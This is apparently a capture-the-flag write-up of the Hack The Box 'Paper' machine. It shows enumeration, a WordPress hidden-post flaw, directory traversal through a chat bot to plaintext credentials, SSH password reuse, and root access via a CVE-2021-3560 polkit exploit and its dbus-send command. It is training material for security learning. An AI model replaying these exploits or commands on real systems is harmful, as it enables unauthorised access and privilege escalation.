Paper Writeup
Introduction :
Paper is an easy box released back in Febuary 2022
Part 1 : Initial Enumeration
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ sudo vim /etc/hosts
[sudo] password for nothing:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ ping paper.htb
PING paper.htb (10.129.136.31) 56(84) bytes of data.
64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=24.9 ms
^C
--- paper.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 24.883/24.883/24.883/0.000 ms
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ nmap -sCV paper.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-30 20:21 CEST
Nmap scan report for paper.htb (10.129.136.31)
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds
Part 2 : Getting User Access
Our nmap scan picked up port 80 running apache 2.4.37 which is most likely running CentOS. When we curl port 80 we see it displays another domain:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ curl -v http://paper.htb
* Trying 10.129.136.31:80...
* Connected to paper.htb (10.129.136.31) port 80 (#0)
GET / HTTP/1.1
Host: paper.htb
User-Agent: curl/7.84.0
Accept: */*
Mark bundle as not supporting multiuse
HTTP/1.1 403 Forbidden
Date: Tue, 30 Aug 2022 18:31:07 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
So we add the domain office.paper to our /etc/hosts file:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ sudo vim /etc/hosts
[sudo] password for nothing:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ cat /etc/hosts | grep paper
10.129.136.31 paper.htb office.paper
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ ping office.paper
PING paper.htb (10.129.136.31) 56(84) bytes of data.
64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=23.2 ms
64 bytes from paper.htb (10.129.136.31): icmp_seq=2 ttl=63 time=23.0 ms
let's enumerate for other subdomains using wfuzz (we specify the wordlist we want to use and we hide 403 code responses):
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ wfuzz -u http://office.paper -H "Host: FUZZ.office.paper" -w /bedrock/strata/kali/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hc 403
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://office.paper/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000070: 200 507 L 13015 W 223163 Ch "chat"
^C /usr/lib/python3.10/site-packages/wfuzz/wfuzz.py:79: UserWarning:Finishing pending requests...
Total time: 5.887163
Processed Requests: 192
Filtered Requests: 191
Requests/sec.: 32.61332
wfuzz found the chat.office.paper subdomain so let's also add it to our /etc/hosts file, then we browse it:
And here we find a rocketchat instance. Let's go back to it after we get credentials. We move on back to the http site with the TLD office.paper:
browsing to http://office.paper/wp-admin reveals that it is a wordpress site. So we run wpscan:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ wpscan --url http://office.paper
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ยฎ
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://office.paper/ [10.129.136.31]
[+] Started: Tue Aug 30 20:47:20 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| - X-Powered-By: PHP/7.2.24
| - X-Backend-Server: office.paper
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress readme found: http://office.paper/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
**[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Found By: Rss Generator (Passive Detection)
| - http://office.paper/index.php/feed/, generator>https://wordpress.org/?v=5.2.3/generator>
| - http://office.paper/index.php/comments/feed/, generator>https://wordpress.org/?v=5.2.3/generator>**
[+] WordPress theme in use: construction-techup
| Location: http://office.paper/wp-content/themes/construction-techup/
| Last Updated: 2021-07-17T00:00:00.000Z
| Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
| [!] The version is out of date, the latest version is 1.4
| Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
| Style Name: Construction Techup
| Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
| Author: wptexture
| Author URI: https://testerwp.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <****=================================================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Aug 30 20:47:25 2022
[+] Requests Done: 185
[+] Cached Requests: 5
[+] Data Sent: 44.421 KB
[+] Data Received: 18.75 MB
[+] Memory used: 227.438 MB
[+] Elapsed time: 00:00:04
So here this wordpress instance is vulnerable to CVE-2019-17671, which is basically a mistake which allows us to view published posts with the following PHP variable: ?static=1 which allows us to see all the other posts:
here a secret post reveals to us the secret registering link, so let's use it to create an account:
once we log in, we can see the following info:
Basically there's a bot called recyclops and we can reach it via DM to type commands:
We can list files with the command "list"
And with directory traversal we see that there is a user on the box called "dwight".
Going just one directory up we see the directory hubot containing a .env file with plaintext credentials: recyclops/Queenofblad3s!23 , so let's check for password reuse with the user dwight:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ crackmapexec ssh office.paper -u dwight -p 'Queenofblad3s!23'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
if result['type'] is not 'searchResEntry':
SSH paper.htb 22 office.paper [*] SSH-2.0-OpenSSH_8.0
SSH paper.htb 22 office.paper [+] dwight:Queenofblad3s!23
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
โ ssh dwight@office.paper
The authenticity of host 'office.paper (10.129.136.31)' can't be established.
ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'office.paper' (ED25519) to the list of known hosts.
dwight@office.paper's password:
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
[dwight@paper ~]$ cat user.txt
a0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we managed to log in and get the user flag!
Part 3 : Getting Root Access
Now in order to privesc let's enumerate the possible privesc paths using linpeas.sh:
[term1]
[dwight@paper ~]$ which wget curl
/usr/bin/wget
/usr/bin/curl
[term2]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
โ wget https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
--2022-08-30 21:12:52-- https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220830T191251Z&X-Amz-Expires;=300&X-Amz-Signature;=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream [following]
--2022-08-30 21:12:53-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220830T191251Z&X-Amz-Expires;=300&X-Amz-Signature;=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 807205 (788K) [application/octet-stream]
Saving to: โlinpeas.shโ
linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 4.40MB/s in 0.2s
2022-08-30 21:12:53 (4.40 MB/s) - โlinpeas.shโ saved [807205/807205]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
โ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[term1]
[dwight@paper ~]$ wget 10.10.14.13:9090/linpeas.sh
--2022-08-30 15:13:45-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 807205 (788K) [application/x-sh]
Saving to: โlinpeas.shโ
linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 2.00MB/s in 0.4s
2022-08-30 15:13:46 (2.00 MB/s) - โlinpeas.shโ saved [807205/807205]
[dwight@paper ~]$ chmod +x linpeas.sh
[dwight@paper ~]$ ./linpeas.sh
` 
Here we see that there should be a buffer overflow vulnerability with the sudo binary, vulnerability nicknamed "Baron Samedit". To check if it is vulnerable we need to run sudoedit -s / and if it returns sudoedit /: not a regular file then it is vulnerable:
[dwight@paper ~]$ sudoedit -s /
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
It's not, however linpeas.sh also picked up that the VM is vulnerable to CVE-2021-3560, so let's exploit it as follows:
[term1]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
โ wget https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
--2022-08-30 21:29:20-- https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2803 (2.7K) [text/plain]
Saving to: โCVE-2021-3560.pyโ
CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0.001s
2022-08-30 21:29:20 (4.58 MB/s) - โCVE-2021-3560.pyโ saved [2803/2803]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
โ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.129.136.31 - - [30/Aug/2022 21:29:45] "GET /CVE-2021-3560.py HTTP/1.1" 200 -
[term2]
[dwight@paper ~]$ wget http://10.10.14.13:9090/CVE-2021-3560.py
--2022-08-30 15:29:44-- http://10.10.14.13:9090/CVE-2021-3560.py
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2803 (2.7K) [text/x-python]
Saving to: โCVE-2021-3560.pyโ
CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0s
2022-08-30 15:29:44 (123 MB/s) - โCVE-2021-3560.pyโ saved [2803/2803]
[dwight@paper ~]$ which python python3
/usr/bin/which: no python in (/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin)
/usr/bin/python3
[dwight@paper ~]$ python3 CVE-2021-3560.py
##############CVE-2021-3560##############
# __________ .__ __ .__ __ #
# \______ \____ | | | | _|__|/ |_ #
# | ___/ _ \| | | |/ / \ __\ #
# | | ( <****_> ) |_| | || | #
# |____| \____/|____/__|_ \__||__| #
# \/ #
# Local Privilege Escalation Exploit #
# Author: Salman Asad (@deathflash1411) #
#########################################
[+] User created!
[+] Username: flash
[+] User ID: 1005
[!] Run the below command a few times ( <****10) and login via su - flash
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye & sleep 0.005s ; kill $!
[dwight@paper ~]$
So let's follow the script's instructions:
[dwight@paper ~]$ python3 CVE-2021-3560.py
##############CVE-2021-3560##############
[+] User created!
[+] Username: flash
[+] User ID: 1005
[!] Run the below command a few times (<****10) and login via su - flash
[dwight@paper ~]$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye
[dwight@paper ~]$ su - flash
Password:
[flash@paper ~]$ id
uid=1005(flash) gid=1005(flash) groups=1005(flash),10(wheel)
[flash@paper ~]$ sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for flash:
[root@paper flash]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper flash]# cat /root/root.txt
2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag!
Conclusion
Here we can see the progress graph :
Nihilist
Donate XMR to Nihilist:
8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8